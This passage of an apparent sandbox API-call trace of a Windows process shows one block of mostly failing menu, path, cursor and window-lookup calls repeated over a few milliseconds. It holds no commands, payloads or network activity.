MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.595] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.595] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.595] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.595] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.595] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.595] GetStockObject (i=6) returned 0x1b00018 [0027.595] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.595] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.595] PathFileExistsW (pszPath=0x0) returned 0 [0027.595] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.595] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.595] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.595] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.595] GetMenu (hWnd=0x0) returned 0x0 [0027.596] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.596] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.596] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.596] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.596] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.596] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.596] GetStockObject (i=6) returned 0x1b00018 [0027.596] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.596] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.596] PathFileExistsW (pszPath=0x0) returned 0 [0027.596] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.596] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.596] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.596] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.596] GetMenu (hWnd=0x0) returned 0x0 [0027.596] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.596] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.596] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.596] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.596] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.596] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.596] GetStockObject (i=6) returned 0x1b00018 [0027.596] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.596] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.596] PathFileExistsW (pszPath=0x0) returned 0 [0027.596] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.596] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.596] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.596] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.596] GetMenu (hWnd=0x0) returned 0x0 [0027.596] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.596] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.596] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.596] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.597] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.597] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.597] GetStockObject (i=6) returned 0x1b00018 [0027.597] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.597] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.597] PathFileExistsW (pszPath=0x0) returned 0 [0027.597] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.597] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.597] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.597] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.597] GetMenu (hWnd=0x0) returned 0x0 [0027.597] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3d1) returned -1 [0027.597] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.597] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.597] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.597] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.597] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.597] GetStockObject (i=6) returned 0x1b00018 [0027.597] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.597] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.597] PathFileExistsW (pszPath=0x0) returned 0 [0027.597] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.597] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.597] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.597] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.597] GetMenu (hWnd=0x0) returned 0x0 [0027.597] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.597] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.597] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.597] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.597] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.597] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.598] GetStockObject (i=6) returned 0x1b00018 [0027.598] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.598] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.598] PathFileExistsW (pszPath=0x0) returned 0 [0027.598] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.598] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.598] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.598] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.598] GetMenu (hWnd=0x0) returned 0x0 [0027.598] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.598] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.598] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.598] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.598] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.598] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.598] GetStockObject (i=6) returned 0x1b00018 [0027.598] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.598] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.598] PathFileExistsW (pszPath=0x0) returned 0 [0027.598] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.598] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.598] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.598] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.598] GetMenu (hWnd=0x0) returned 0x0 [0027.598] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.598] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.598] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.598] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.598] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.598] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.598] GetStockObject (i=6) returned 0x1b00018 [0027.598] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.598] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.598] PathFileExistsW (pszPath=0x0) returned 0 [0027.599] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.599] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.599] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.599] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.599] GetMenu (hWnd=0x0) returned 0x0 [0027.599] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.599] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.599] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.599] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.599] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.599] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.599] GetStockObject (i=6) returned 0x1b00018 [0027.599] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.599] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.599] PathFileExistsW (pszPath=0x0) returned 0 [0027.599] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.599] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.599] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.599] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.599] GetMenu (hWnd=0x0) returned 0x0 [0027.599] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x194) returned -1 [0027.599] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.599] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.599] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.599] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.599] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.599] GetStockObject (i=6) returned 0x1b00018 [0027.599] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.599] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.599] PathFileExistsW (pszPath=0x0) returned 0 [0027.599] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.599] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.599] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.599] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.600] GetMenu (hWnd=0x0) returned 0x0 [0027.600] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.600] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.600] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.600] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.600] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.600] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.600] GetStockObject (i=6) returned 0x1b00018 [0027.600] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.600] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.600] PathFileExistsW (pszPath=0x0) returned 0 [0027.600] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.600] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.600] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.600] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.600] GetMenu (hWnd=0x0) returned 0x0 [0027.600] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.600] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.600] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.600] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.600] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.600] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.600] GetStockObject (i=6) returned 0x1b00018 [0027.600] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.600] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.600] PathFileExistsW (pszPath=0x0) returned 0 [0027.600] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.600] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.600] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.600] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.600] GetMenu (hWnd=0x0) returned 0x0 [0027.600] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.600] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.601] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.601] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.601] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.601] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.601] GetStockObject (i=6) returned 0x1b00018 [0027.601] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.601] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.601] PathFileExistsW (pszPath=0x0) returned 0 [0027.601] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.601] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.601] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.601] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.601] GetMenu (hWnd=0x0) returned 0x0 [0027.601] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.601] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.601] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.601] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.601] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.601] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.601] GetStockObject (i=6) returned 0x1b00018 [0027.601] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.601] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.601] PathFileExistsW (pszPath=0x0) returned 0 [0027.601] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.601] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.601] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.601] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.601] GetMenu (hWnd=0x0) returned 0x0 [0027.601] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1ef) returned -1 [0027.601] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.601] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.601] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.601] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.601] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.602] GetStockObject (i=6) returned 0x1b00018 [0027.602] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.602] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.602] PathFileExistsW (pszPath=0x0) returned 0 [0027.602] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.602] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.602] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.602] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.602] GetMenu (hWnd=0x0) returned 0x0 [0027.602] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.602] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.602] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.602] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.602] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.602] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.602] GetStockObject (i=6) returned 0x1b00018 [0027.602] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.602] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.602] PathFileExistsW (pszPath=0x0) returned 0 [0027.602] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.602] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.602] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.602] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.602] GetMenu (hWnd=0x0) returned 0x0 [0027.602] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.602] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.602] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.602] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.602] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.602] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.602] GetStockObject (i=6) returned 0x1b00018 [0027.602] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.602] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.602] PathFileExistsW (pszPath=0x0) returned 0 [0027.602] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.603] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.603] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.603] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.603] GetMenu (hWnd=0x0) returned 0x0 [0027.603] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.603] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.603] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.603] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.603] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.603] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.603] GetStockObject (i=6) returned 0x1b00018 [0027.603] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.603] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.603] PathFileExistsW (pszPath=0x0) returned 0 [0027.603] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.603] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.603] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.603] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.603] GetMenu (hWnd=0x0) returned 0x0 [0027.603] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.603] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.603] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.603] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.603] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.603] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.603] GetStockObject (i=6) returned 0x1b00018 [0027.603] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.603] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.603] PathFileExistsW (pszPath=0x0) returned 0 [0027.603] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.603] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.603] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.603] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.604] GetMenu (hWnd=0x0) returned 0x0 [0027.604] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xe1) returned -1 [0027.604] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.604] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.604] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.604] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.604] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.604] GetStockObject (i=6) returned 0x1b00018 [0027.604] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.604] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.604] PathFileExistsW (pszPath=0x0) returned 0 [0027.604] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.604] GetCursorPos (in: lpPoint=0x18f5e4 | out: 